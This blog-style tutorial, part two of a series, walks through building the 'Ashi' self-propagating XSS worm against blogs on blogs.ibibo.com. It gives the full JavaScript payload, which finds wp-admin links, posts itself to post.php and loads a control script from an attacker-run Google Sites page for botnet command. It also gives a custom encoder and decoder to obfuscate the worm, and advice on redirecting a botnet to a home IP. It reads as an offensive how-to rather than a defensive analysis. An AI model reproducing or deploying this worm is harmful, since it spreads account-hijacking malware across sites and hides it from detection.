Demystifying The Ashi virus--"mukesh" PART II

This is a google's free page uploading facility (http://sites.google.com/site). I loaded the .js file as an attatchment. But it contained nothing initially.It was meant for controlling the Botnet and commanding it later in forming the XSS tunnels. It was the second stage of two staged botnet formation.Note: The third party free sites are also useful to connect to a botnet if you do not have any dedicated server. In ur script file at free site like google,you can place a script that can redirect the requests to ur home computer. This can be achieved by using a simplest <script> tag with its "src" attribute defined to ur home computer's current IP address. But this makes it necessary to remove such redirector scripts or change the IP address everytime you get a new IP address or disconnect. Otherwise,the botnet will be orphaned or will end up in chaos.

Now, we have formed a script. But still; it cannot go beyond the currently infected blogs.We need to direct our script to inject itself (whole script) into other blogs also. This can be achieved by a enclosing whole script into a
string variable and then using the eval() method.The eval () method takes a string type argument that holds the code for execution and executes the code.For example, if we have some code in a variable vinnu and we want to
execute it, then we can do it like:
var vinnu = "alert(document.cookie);";eval(vinnu);

So what we can do now is, we have to equate above all code into a variable and then feed this very variable to the "content" variable and eval the variable as in above script.I defined a variable named "ashi" and fed it to the "content" in blogs payload for posting it to the post.php. And finally called eval();
Note: Check this scenario:
eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";
This script will fail. It works normally with the lately defined function, but not with variables.The above script will work second time, but will fail for first time, So never use it: eval(vinnu);var vinnu="alert(document.cookie)";

This is because When it gets executed for first time, eval cannot resolve variable as variables should be defined first and called later (Not the case with functions).But the in second attempt, it already has defined the variable "vinnu" after the failure of eval during first execution. Also the alert() method is added just for debugging purpose and it must be removed in final product.

Therefor It should now look like something:
var ashi='trigger();function trigger(){var vin=.....
.................................................. ..
.................................................. ..
blpayload+=encodeURIComponent(\"><\"+\"sc\"+\"ript
language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");
blpayload+=encodeURIComponent(nunnu);............. ..
.................................................. ..
The important part here I want to discus is:
\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
Now i have turned whole script into a string variable.And thats why i have to escape all double and single quotation marks with a preffixed escape character ( \ ).Also i have to explicitely define variable "ashi" once again within
the string also. This is necessary. We want the code to regain the shape of its parent code once again. And the parent code itself starts with
<script>var ashi = '..........
Also remember that do not specify <script> or </script> anywhere even within the string or variable. This is because the browser's javascript engine will take </script> tag as the end of the script code.
So always break it into pieces as:
"</sc"+"rip"+"t>"
Now after applying above concepts I got the following code:
javascript:var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/urcontrolledsite/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:blog();>Jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"Jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=Jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");blpayload+=encodeURICompo
nent(nunnu);blpayload+=\"hor&tags_input=&action=po st-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,b lpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try {xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return ;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-formurlencoded\");
xmlhttp.setRequestHeader(\"Contentlength\",
payload.length);xmlhttp.send(payload);alert(payloa d);}';eval(ashi);alert(
"done");

The HTML tags which are appearing within the script are for the alignment of the Injection Vector of the XSS payload. The virus is ready. And u can trigger it now from your web-browser's addressbar while you are already logged in into the blogs.ibibo.com. But this virus is still in clear text. So why not apply some scrambling
to it. There are some easiest and fast ways to do it (There are also robust encryption schemes like DES, SHA, RSA, base64,..etc. But i used the simplest to save the processing overhead). One simplest way to do it by using escape() and its decoder is unescape(). The escape() function converts special charecters into their hex form by prefixing
the hex with a "%" sign. We can use escape multiple times.

Remember more you'll escape it will increase the size of scramble everytime. Now I have a facility to convert all special charecters. But what about the character literals. I have to develop a special encoder and decoder for
them. I don't want to scramble all of the characters, just jumbling some of them will
be enough. As a choice for encryption technique, i used the several thousand years
old technique ... the transformation technique and the script I developed is
The encoder: function z(x) {
x=escape(x);
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="%") {
s="Q";
}else if(s=="i"){s="Z"}else if(s=="a"){s="J";}else if(s=="t")
{s="F";}
else{s=x.charAt(i);}
r+=s;
}return r; }

The decoder:
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) { s=x.charAt(i);
if(s=="Q"){
s="%";
}else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else
if(s=="F"){s="t";}
else{s=x.charAt(i);}
r+=s;
}r=unescape(r);return r;
}
I just replaced"%" with "Q", "i" with "Z", "a" with "J", and "t" with "F".

I've used the encoder only once in this case. And the virus code contained the scrambled code and a decoder and and eval(). The decoder code was also inside the scramble and while infecting it should also
place the unscrambled decoder and eval() function in the body of virus. Once the code executed it will infect other blogs with decoder and eval attached at the end of the scrambled code. But the decoder has a problem in this case. Once it will go under scrambling, following code will be interchanged as shown below:
s="i" to s="Z" making if(s=="Z"){s="i";} to if(s=="Z"){s="Z";}
Similarly for other charecters. And the decoder will fail to decode properly. So i interchanged the charecters with their hex equivalents and the decoder code was changed as shown below:
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="\x51") {
s="\x25";
}else if(s=="\x5A") {
s="\x69";
}else if(s=="\x4A") {
s="\x61";
}else if(s=="\x46") {
s="\x74";
}else {
s=x.charAt(i);
}r+=s;
}
r=unescape(r);return r;
}